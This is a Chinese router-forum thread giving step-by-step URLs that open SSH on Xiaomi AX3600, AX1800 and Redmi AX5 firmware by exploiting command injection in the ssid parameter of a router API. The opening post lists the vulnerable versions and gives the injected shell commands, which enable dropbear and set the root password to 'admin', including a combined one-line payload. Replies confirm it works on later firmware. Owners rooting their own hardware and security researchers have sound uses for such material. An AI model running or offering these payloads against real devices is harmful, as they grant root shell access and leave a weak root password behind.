找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 33953|回复: 46

[AX3600] AX3600、AX1800、AX5官方固件开启SSH方法——清雨收集并优化

 火.. [复制链接]
发表于 2020-6-20 21:23 | 显示全部楼层 |阅读模式
本帖最后由 haifon 于 2020-6-23 01:53 编辑

AX3600、AX1800、AX5官方固件开启SSH方法——清雨收集并优化,小白版我恩山第一次发帖子,群里很多人看原帖不会,让我发帖我改下,希望原作者不要怪
详细请看原帖
https://www.right.com.cn/forum/f ... hlight=ax5&mobile=2

有漏洞固件
AX3600 1.0.17版本/AX1800 1.0.34/1.0.328版本/AX5 1.0.16版本;AX3600的1.0.20和1.0.50版本应该已经修复了

AX1800 1.0.34版本固件竟然同样也可用以下方法开启SSH,1.0.328的固件仍然适用,最新的1.0.336未知,有兴趣的同学验证

同样适用于红米AX5,出厂固件1.0.16版本


进入路由复制串号,替换下面的小写stok等号右边的大写<STOK>,带符号一起替换,不要说误人子弟,细心的复制串号就可对比发现
开ssh命令:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
改密码命令(必须改密码,不改密码无法连接ssh):改密码为admin
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

改成一行
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B




点评

你说的很对,我赞同你的说法。: 5.0
你说的很对,我赞同你的说法。: 5
告诉大家AX1800 1.0.336 测试通过,大家可以放心升级  发表于 2020-6-20 22:16

评分

参与人数 2恩山币 +2 收起 理由
viper2000 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
Tyrantcwj + 1 AX1800 1.0.336 今早测试成功

查看全部评分

发表于 2020-6-20 21:30 | 显示全部楼层
原帖隐藏的内容这样发出来不好吧
回复 支持 反对

使用道具 举报

发表于 2020-6-20 21:58 | 显示全部楼层
楼主怎么使用这几个连接
回复 支持 反对

使用道具 举报

发表于 2020-6-20 22:47 | 显示全部楼层
买个AX1800试一试
回复 支持 反对

使用道具 举报

发表于 2020-6-20 23:03 | 显示全部楼层
原作者说“转贴请注明作者及出处”!!!
回复 支持 反对

使用道具 举报

发表于 2020-6-20 23:16 | 显示全部楼层
感谢楼主的分享
回复 支持 反对

使用道具 举报

发表于 2020-6-20 23:36 | 显示全部楼层
热度蹭的明明白白。
回复 支持 反对

使用道具 举报

发表于 2020-6-20 23:49 | 显示全部楼层
什么情况

回复 支持 反对

使用道具 举报

发表于 2020-6-21 02:21 | 显示全部楼层
谢谢,改天试试
回复 支持 反对

使用道具 举报

发表于 2020-6-21 09:22 | 显示全部楼层
{"code":401,"msg":"Invalid token"}    这个是什么,怎么搞
回复 支持 反对

使用道具 举报

发表于 2020-6-21 09:27 | 显示全部楼层
<STOK>连带这个2个三角符号也要删掉,填入一串数字,我本来以为符号要的,这个误人子弟啊
回复 支持 反对

使用道具 举报

发表于 2020-6-21 22:33 | 显示全部楼层

感谢楼主的分享
回复 支持 反对

使用道具 举报

发表于 2020-6-22 02:02 | 显示全部楼层
AX1800亲测1.0.336可用
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-6-23 01:46 来自手机 | 显示全部楼层
替换下面的<STOK>用蓝色标注了,肯定带符号替换,还误认子弟,真不知道怎么理解的,都标颜色了,细心的和官方串号对比就知道了
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-6-23 01:49 来自手机 | 显示全部楼层
为何要加<STOK>还大写,就是因为有二个stok有人就会都替换,啥人都有,思考能力也是醉了,第一次发帖,碰一鼻子灰,还要群里论坛里解释累少发帖了少累
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-6-6 00:55

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表